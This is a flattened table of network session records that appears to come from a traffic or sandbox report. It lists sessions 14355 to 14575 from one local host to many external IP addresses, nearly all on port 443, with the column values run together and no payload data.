                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14355192.168.2.235844017.129.196.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14356192.168.2.235068240.65.224.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14357192.168.2.2342092123.132.164.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14358192.168.2.2350406116.255.52.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14359192.168.2.2344314113.18.194.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14360192.168.2.233968085.33.159.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14361192.168.2.2348736174.218.151.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14362192.168.2.234347878.133.116.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14363192.168.2.2352504213.80.82.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14364192.168.2.234573818.193.118.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14365192.168.2.2356160126.242.34.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14366192.168.2.233285262.181.3.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14367192.168.2.2345672172.237.71.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14368192.168.2.2357626192.184.228.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14369192.168.2.234587877.75.253.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14370192.168.2.2335828179.110.83.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14371192.168.2.234108413.189.210.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14372192.168.2.235773019.21.253.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14373192.168.2.2344710178.21.152.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14374192.168.2.2355216199.142.193.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14375192.168.2.2357132110.129.85.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14376192.168.2.2334252199.216.104.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14377192.168.2.2345088163.121.19.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14378192.168.2.23412442.148.223.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14379192.168.2.2343328208.222.2.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14380192.168.2.2345534174.141.204.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14381192.168.2.234809895.194.48.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14382192.168.2.2335364162.154.159.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14383192.168.2.2348616190.249.103.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14384192.168.2.234360032.42.227.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14385192.168.2.2344810156.252.120.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14386192.168.2.2348080153.169.123.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14387192.168.2.235833846.105.47.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14388192.168.2.2338544201.55.107.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14389192.168.2.2335334138.178.20.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14390192.168.2.2344716149.176.24.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14391192.168.2.2351532111.128.94.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14392192.168.2.234898020.143.211.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14393192.168.2.234414023.111.218.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14394192.168.2.2351900125.251.160.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14395192.168.2.2339346185.153.60.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14396192.168.2.2339374107.86.132.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14397192.168.2.233962620.47.249.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14398192.168.2.2356882105.55.112.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14399192.168.2.2335208103.242.83.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14400192.168.2.2336466191.118.15.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14401192.168.2.2342838218.238.181.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14402192.168.2.235655040.136.249.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14403192.168.2.2339030188.76.53.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14404192.168.2.235052292.246.247.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14405192.168.2.2336138176.199.10.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14406192.168.2.2348114177.106.177.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14407192.168.2.2349694203.254.131.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14408192.168.2.235700241.24.63.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14409192.168.2.2338720141.77.125.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14410192.168.2.234621841.107.46.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14411192.168.2.235783488.207.39.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14412192.168.2.2338744179.93.86.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14413192.168.2.2359884158.243.203.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14414192.168.2.2347572130.232.55.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14415192.168.2.2332888142.136.32.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14416192.168.2.234388267.131.74.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14417192.168.2.233303417.184.183.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14418192.168.2.2344542170.83.80.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14419192.168.2.235237665.114.224.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14420192.168.2.2339520108.206.53.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14421192.168.2.235290671.228.247.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14422192.168.2.235212471.45.190.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14423192.168.2.2336106118.17.187.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14424192.168.2.2334500204.40.240.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14425192.168.2.235872838.55.24.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14426192.168.2.234752263.134.123.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14427192.168.2.2334134174.87.197.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14428192.168.2.235647681.80.43.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14429192.168.2.234957696.192.250.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14430192.168.2.2359682185.193.24.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14431192.168.2.235845852.210.6.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14432192.168.2.234895666.208.143.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14433192.168.2.2360916105.218.152.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14434192.168.2.2350432207.34.230.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14435192.168.2.233711498.65.80.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14436192.168.2.2357928136.239.214.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14437192.168.2.235452461.251.238.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14438192.168.2.2337796191.248.124.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14439192.168.2.2348306150.14.205.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14440192.168.2.23485764.91.222.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14441192.168.2.236087434.156.101.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14442192.168.2.234696069.203.127.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14443192.168.2.2333480197.106.200.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14444192.168.2.2339838202.86.109.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14445192.168.2.235136873.253.222.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14446192.168.2.2338222181.202.227.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14447192.168.2.2336276223.128.238.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14448192.168.2.235881498.20.198.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14449192.168.2.236085092.234.89.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14450192.168.2.2349118150.204.168.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14451192.168.2.233759623.93.84.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14452192.168.2.2338864107.151.9.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14453192.168.2.2345542183.86.86.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14454192.168.2.2339824168.217.103.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14455192.168.2.233561268.100.239.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14456192.168.2.235315672.92.219.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14457192.168.2.234936042.104.182.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14458192.168.2.2353468122.255.134.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14459192.168.2.2355286198.130.198.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14460192.168.2.235249065.182.223.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14461192.168.2.2351696191.85.225.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14462192.168.2.233281454.191.175.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14463192.168.2.2356460221.246.94.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14464192.168.2.2341788114.208.54.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14465192.168.2.2333148205.48.100.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14466192.168.2.2348310203.240.151.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14467192.168.2.2360808213.179.48.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14468192.168.2.233962864.45.68.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14469192.168.2.2336180132.152.95.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14470192.168.2.2346586193.230.83.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14471192.168.2.2351526148.107.170.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14472192.168.2.2348180101.46.21.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14473192.168.2.2338448123.234.164.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14474192.168.2.235277240.1.128.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14475192.168.2.234001023.4.231.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14476192.168.2.233736613.158.60.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14477192.168.2.2340362186.91.208.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14478192.168.2.2333066128.234.136.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14479192.168.2.235489877.187.69.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14480192.168.2.235969693.68.88.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14481192.168.2.234025088.173.143.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14482192.168.2.2352868158.248.90.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14483192.168.2.234575438.186.102.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14484192.168.2.2360976103.170.189.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14485192.168.2.2341826143.29.0.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14486192.168.2.2336436216.132.247.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14487192.168.2.2344916164.230.109.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14488192.168.2.234509697.15.200.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14489192.168.2.2344132147.94.152.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14490192.168.2.235691457.200.253.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14491192.168.2.2344786138.234.205.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14492192.168.2.2352668102.32.37.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14493192.168.2.2348058189.68.24.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14494192.168.2.2338452147.145.122.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14495192.168.2.235810294.77.135.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14496192.168.2.2348644216.238.204.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14497192.168.2.2346870158.113.204.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14498192.168.2.2345358191.200.71.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14499192.168.2.2359990140.118.71.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14500192.168.2.2351568210.204.198.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14501192.168.2.2352640122.205.72.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14502192.168.2.2335234157.247.229.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14503192.168.2.23380185.134.73.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14504192.168.2.2332874197.187.188.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14505192.168.2.233729657.237.111.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14506192.168.2.235280295.46.254.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14507192.168.2.2343130121.184.109.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14508192.168.2.2354804108.85.152.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14509192.168.2.2355840128.204.109.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14510192.168.2.2348122154.180.59.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14511192.168.2.2336228187.186.93.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14512192.168.2.2340278148.77.69.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14513192.168.2.2348506118.110.165.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14514192.168.2.23578402.202.169.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14515192.168.2.2340766125.205.234.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14516192.168.2.2340852213.142.217.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14517192.168.2.2359768146.96.238.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14518192.168.2.2340622154.89.96.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14519192.168.2.2356930108.207.95.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14520192.168.2.2351680168.197.32.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14521192.168.2.234298297.55.73.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14522192.168.2.235418238.188.138.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14523192.168.2.2339158186.254.93.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14524192.168.2.2334164159.238.10.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14525192.168.2.234996892.182.116.198080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14526192.168.2.2333656205.184.108.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14527192.168.2.233414285.247.86.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14528192.168.2.2356700114.176.179.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14529192.168.2.2350870197.35.15.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14530192.168.2.2359252200.146.90.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14531192.168.2.2355278107.132.55.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14532192.168.2.2351000173.96.248.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14533192.168.2.2356266157.61.32.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14534192.168.2.2336524200.54.221.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14535192.168.2.2339114125.72.223.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14536192.168.2.2343468157.169.18.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14537192.168.2.235790449.37.163.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14538192.168.2.2352310133.192.146.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14539192.168.2.2335202220.73.23.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14540192.168.2.234573031.101.135.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14541192.168.2.233939837.94.106.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14542192.168.2.234993031.119.152.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14543192.168.2.2347830122.154.163.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14544192.168.2.234463461.202.29.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14545192.168.2.2352164117.86.2.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14546192.168.2.2343566207.237.25.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14547192.168.2.233536636.4.57.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14548192.168.2.234547454.34.195.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14549192.168.2.235244691.204.135.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14550192.168.2.234383820.232.62.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14551192.168.2.233875448.50.149.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14552192.168.2.2339188181.177.60.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14553192.168.2.2339378200.167.161.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14554192.168.2.2339294176.102.226.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14555192.168.2.2355912170.170.214.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14556192.168.2.2350124172.170.172.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14557192.168.2.233729279.47.148.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14558192.168.2.2353048197.87.42.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14559192.168.2.2358570135.207.141.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14560192.168.2.235979636.116.109.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14561192.168.2.235047695.240.220.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14562192.168.2.23577169.128.213.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14563192.168.2.233611839.214.202.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14564192.168.2.2360704166.185.28.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14565192.168.2.2356944205.59.125.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14566192.168.2.235033686.38.146.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14567192.168.2.234160088.154.90.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14568192.168.2.2359378200.234.167.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14569192.168.2.2357426124.231.221.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14570192.168.2.2342402139.44.186.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14571192.168.2.2354556162.15.78.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14572192.168.2.233392440.92.193.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14573192.168.2.234263066.88.186.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14574192.168.2.2347230126.190.149.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14575192.168.2.2343256218.131.59.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
